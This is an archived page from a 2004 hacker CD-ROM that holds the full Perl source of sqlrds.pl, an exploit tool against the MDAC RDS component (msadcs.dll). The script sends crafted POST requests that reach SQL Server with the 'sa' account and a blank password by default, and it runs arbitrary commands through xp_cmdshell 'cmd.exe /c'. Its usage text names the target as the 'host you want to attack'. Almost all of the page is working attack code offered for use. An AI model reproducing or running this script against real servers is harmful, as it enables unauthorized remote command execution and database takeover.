H4CK3R 15

home *** CD-ROM | disk | FTP | other *** search

/ H4CK3R 15 / hacker15 / 15_H4CK3R#15.ISO / eploits / sqlrds / sqlrds.pl < prev

Wrap

Perl Script | 2004-03-03 | 6.2 KB | 249 lines

#!/usr/bin/perl -w ############### ## # tool: sqlrds.pl # version: 1.1 # author: H D Moore <hdmoore@digitaldefense.net> # purpose: Provides access to SQL servers via RDS (MDAC 1.5 -> 2.5) # usage: Run with no arguments for usage options # output: Garbled output from RDS component, binary garbage mostly # bugs: SQL 6.5 doesnt allow commands longer than 30 chars through RDS ## use strict; use Socket; use Getopt::Std; # determine whether or not to enable SSL support my $HAVE_SSL = 0; BEGIN { if (eval "require Net::SSLeay") { Net::SSLeay->import(); Net::SSLeay::load_error_strings(); Net::SSLeay::SSLeay_add_ssl_algorithms(); Net::SSLeay::randomize(); $HAVE_SSL = 1; } } ## ## # MAIN STARTS HERE # ## ## my %args; getopts("h:s:d:u:p:c:q:P:w:W:xv", \%args); my $VERSION = "1.1"; # global options hash my %options = ( "Port" => 80, "Server" => "(local)", "Query" => "SELECT 1 + 1", "DSN" => "", "Database" => "master", "Username" => "sa", "Password" => "", "Proxy" => "", "ProxyPort" => "", "Prefix" => "" ); # require the host argument if (!defined($args{h})) { usage(); } # validate the host my $bip; $bip = gethostbyname($args{h}); if (length($bip) == 0){ print STDERR "Could not resolve host.\n"; exit; } $options{"Host"} = $args{h}; $options{"HostIP"} = $bip; # if we are using ssl, change the default port if($args{x} && $HAVE_SSL == 0){ print "Please install the Net::SSLeay module for SSL support.\n"; exit; } if ($args{x}) { $options{"Port"} = 443; } if ($args{x} && $args{w}) { print "Proxy support is not implemented for SSL connections.\n"; exit; } # validate the port if(defined($args{P})) { if (int($args{P}) > 65535 || int($args{P}) <= 0) { print "Invalid port specified.\n"; exit; } $options{"Port"} = $args{P}; } # validate the proxy port if(defined($args{W})) { if (int($args{W}) > 65535 || int($args{W}) <= 0) { print "Invalid proxy port specified.\n"; exit; } $options{"ProxyPort"} = $args{W}; } # web proxy support if(defined($args{w})) { $options{"Proxy"} = $args{w}; $options{"Prefix"} = "http://" . $options{"Host"} . ":" . $options{"Port"}; $options{"Port"} = $options{"ProxyPort"}; $options{"HostIP"} = gethostbyname($options{"Proxy"}); if (length($options{"HostIP"}) == 0){ print STDERR "Could not resolve proxy host.\n"; exit; } } if(defined($args{s})){$options{"Server"} = $args{s}; } if(defined($args{u})){$options{"Username"} = $args{u}; } if(defined($args{p})){$options{"Password"} = $args{p}; } if(defined($args{c})){$options{"Query"} = "EXEC master..xp_cmdshell \"cmd.exe /c" . $args{c} . "\""; } if(defined($args{q})){$options{"Query"} = $args{q}; } # create dsn $options{"DSN"} = "DRIVER={SQL Server};SERVER=".$options{"Server"}.";DATABASE=".$options{"Database"}.";UID=".$options{"Username"}.";PWD=".$options{"Password"}; $options{"ReqLen"} = length(make_request()) - 28; $options{"ReqLenLen"} = length($options{"ReqLen"}); $options{"ConLen"} = 206 + $options{"ReqLen"} + $options{"ReqLenLen"}; my $results= send_request( make_header() . make_request()); $results =~ s/\x00//g; $results =~ s/\xff\x62/\n/g; print "---[ RESULTS ]---\n$results\n\n"; sub usage { print STDERR qq{ *- -- ---[ sqlrds.pl v$VERSION - H.D. Moore <hdmoore\@digitaldefense.net> Usage: $0 -h <host> -c 'command' -h <host> = host you want to attack -s <sql server> = the sql server to use (local) -d <database> = the database to use (master) -u <username> = username to use (sa) -p <password> = password to use (blank) -c <command> = command to execute -q <sql query> = sql query (instead of command) -P <port> = web server port -w <proxy host> = http proxy host -W <proxy port> = http proxy port Options: -x = ssl mode -v = verbose }; exit(1); } sub send_request { my ($request) = @_; my $results = ""; my $got; my $ssl; my $ctx; my $res; select(STDOUT); $| = 1; socket(S,PF_INET,SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n"); select(S); $|=1; select(STDOUT); if(connect(S, pack "SnA4x8", 2, $options{"Port"}, $options{"HostIP"})) { if ($args{x}) { $ctx = Net::SSLeay::CTX_new() or die_now("Failed to create SSL_CTX $!"); $ssl = Net::SSLeay::new($ctx) or die_now("Failed to create SSL $!"); Net::SSLeay::set_fd($ssl, fileno(S)); # Must use fileno $res = Net::SSLeay::connect($ssl); $res = Net::SSLeay::write($ssl, $request); # Perl knows how long $msg is shutdown S, 1; while ($got = Net::SSLeay::read($ssl)) { $results .= $got; } Net::SSLeay::free ($ssl); # Tear down connection Net::SSLeay::CTX_free ($ctx); close(S); } else { print S $request; sleep(1); shutdown S, 1; while ($got = <S>) { $results .= $got; } close(S); } } else { die("Error: connection failed.\n"); } return $results; } # blatently ripped from msadc2.pl sub make_unicode { my ($in)=@_; my $out; for (my $c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; } return $out; } # blatently ripped from msadc2.pl sub make_header { my ($aa, $bb, $msadc); $aa="AdvancedDataFactory.Query"; $bb="3"; $msadc=<<EOT POST $options{"Prefix"}/msadc/msadcs.dll/$aa HTTP/1.1 User-Agent: ACTIVEDATA Host: $options{"Host"} Content-Length: $options{"ConLen"} Connection: Close ADCClientVersion:01.06 Content-Type: multipart/mixed; boundary=!DDI!ROX!YOUR!WORLD!; num-args=$bb --!DDI!ROX!YOUR!WORLD! Content-Type: application/x-varg Content-Length: $options{"ReqLen"} EOT ; $msadc=~s/\n/\r\n/g; return $msadc; } # blatently ripped from msadc2.pl sub make_request { my ($req, $t1, $t2); $t1 = make_unicode($options{"Query"}); $t2 = make_unicode($options{"DSN"}); $req = "\x02\x00\x03\x00"; $req.= "\x08\x00" . pack ("S1", length($t1)); $req.= "\x00\x00" . $t1 ; $req.= "\x08\x00" . pack ("S1", length($t2)); $req.= "\x00\x00" . $t2 ; $req.="\r\n--!DDI!ROX!YOUR!WORLD!--\r\n"; return $req; }